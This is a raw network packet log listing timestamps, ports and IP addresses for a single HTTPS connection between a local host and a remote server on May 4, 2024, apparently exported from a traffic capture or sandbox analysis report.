May 4, 2024 09:48:39.416407108 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.418222904 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.418236971 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.418275118 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.418281078 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.418303967 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.418320894 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.420044899 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.420062065 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.420109987 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.420114994 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.420155048 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.421921968 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.421936989 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.421978951 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.421984911 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.422008991 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.422022104 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.424169064 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.424185038 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.424247026 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.424253941 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.424345970 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.425973892 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.425990105 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.426027060 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.426032066 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.426059961 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.426079035 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.430255890 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.430290937 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.430327892 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.430335045 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.430361986 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.430383921 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.430871010 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.430893898 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.430929899 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.430937052 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.430960894 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.430975914 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.431660891 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.431684017 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.431741953 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.431749105 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.431793928 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.433855057 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.433873892 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.433922052 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.433929920 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.433967113 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.438023090 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.438050985 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.438102007 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.438108921 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.438147068 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.438448906 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.438473940 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.438518047 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.438525915 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.438561916 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.440536022 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.440558910 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.440601110 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.440607071 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.440634012 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.440656900 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.442271948 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.442296982 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.442331076 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.442337990 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.442363024 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.442380905 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.444468021 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.444483995 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.444519043 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.444525003 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.444545031 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.444566965 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.446325064 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.446361065 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.446389914 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.446394920 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.446420908 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.446441889 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.448239088 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.448309898 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.448316097 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.448322058 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.448362112 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.450026035 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.450047016 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.450090885 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.450098991 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.450160980 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.453032970 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.453061104 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.453088999 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.453095913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.453120947 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.453130007 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.454468966 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.454485893 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.454525948 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.454533100 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.454560041 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.454576969 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.456089020 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.456116915 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.456147909 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.456155062 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.456178904 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.456195116 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.457984924 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.458005905 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.458064079 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.458070993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.458108902 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.461174965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.461194038 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.461242914 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.461249113 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.461277962 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.461292982 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.462398052 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.462440014 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.462476015 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.462483883 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.462507963 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.462522030 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.463776112 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.463793993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.463845968 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.463854074 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.463886023 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.466536045 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.466563940 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.466593981 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.466599941 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.466634989 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.466648102 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.467319012 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.467339993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.467369080 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.467375994 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.467401028 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.467420101 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.469525099 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.469544888 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.469657898 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.469666958 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.469701052 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.471030951 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.471055984 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.471124887 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.471136093 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.471169949 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.473998070 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.474023104 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.474087000 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.474093914 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.474112988 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.474127054 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.475848913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.475878954 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.475924015 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.475929976 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.475961924 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.475980043 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.478908062 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.478952885 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.478979111 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.478985071 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.479023933 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.479263067 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.479279995 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.479336023 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.479341030 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.479370117 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.479384899 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.481831074 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.481848955 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.481889009 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.481894970 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.481935978 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.482168913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.482220888 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.482234001 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.482239962 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.482295990 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.483767033 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.483787060 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.483829975 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.483836889 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.483860016 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.483877897 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.485677958 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.485704899 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.485743999 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.485750914 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.485785007 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.488359928 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.488387108 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.488442898 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.488451004 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.488507032 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.490313053 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.490331888 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.490390062 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.490396976 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.490433931 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.491437912 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.491460085 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.491503954 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.491509914 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.491530895 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.491565943 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.493810892 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.493879080 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.493884087 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.493902922 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.493923903 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.493957043 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.495165110 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.495182991 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.495291948 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.495304108 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.495342970 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.496825933 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.496844053 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.496880054 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.496889114 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.496910095 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.496931076 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.501146078 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.501166105 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.501207113 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.501214981 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.501236916 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.501252890 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.502317905 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.502336979 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.502382994 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.502389908 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.502412081 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.502428055 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.504024982 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.504043102 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.504079103 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.504084110 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.504125118 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.506081104 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.506105900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.506140947 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.506146908 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.506175041 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.507473946 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.507498026 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.507538080 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.507544041 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.507570028 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.507586956 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.508480072 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.508497000 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.508549929 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.508557081 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.508585930 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.509999990 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.510025024 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.510072947 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.510078907 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.510123014 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.511746883 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.511790991 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.512036085 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.512042999 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.512073040 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.513318062 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.513350010 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.513381004 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.513386011 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.513412952 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.513437033 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.515014887 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.515038967 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.515090942 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.515096903 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.515141964 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.516679049 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.516700029 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.516752005 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.516760111 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.516791105 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.517919064 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.517937899 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.517980099 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.517985106 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.518018961 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680464029 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680489063 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680545092 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680561066 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680574894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680579901 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680598021 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680618048 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680630922 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680648088 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680653095 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680666924 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680669069 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680680037 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680707932 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680727959 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680743933 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680747986 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680757999 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680782080 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680799961 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680804014 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680814028 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680844069 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680857897 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680865049 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680875063 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680893898 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680905104 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680936098 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680949926 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680955887 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.680963993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.680999994 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681015015 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681035042 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681067944 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681075096 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681085110 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681098938 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681102037 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681138039 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681147099 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681164980 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681174040 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681185961 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681210995 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681216955 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681230068 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681243896 CEST	443	49707	172.67.215.45	192.168.2.6
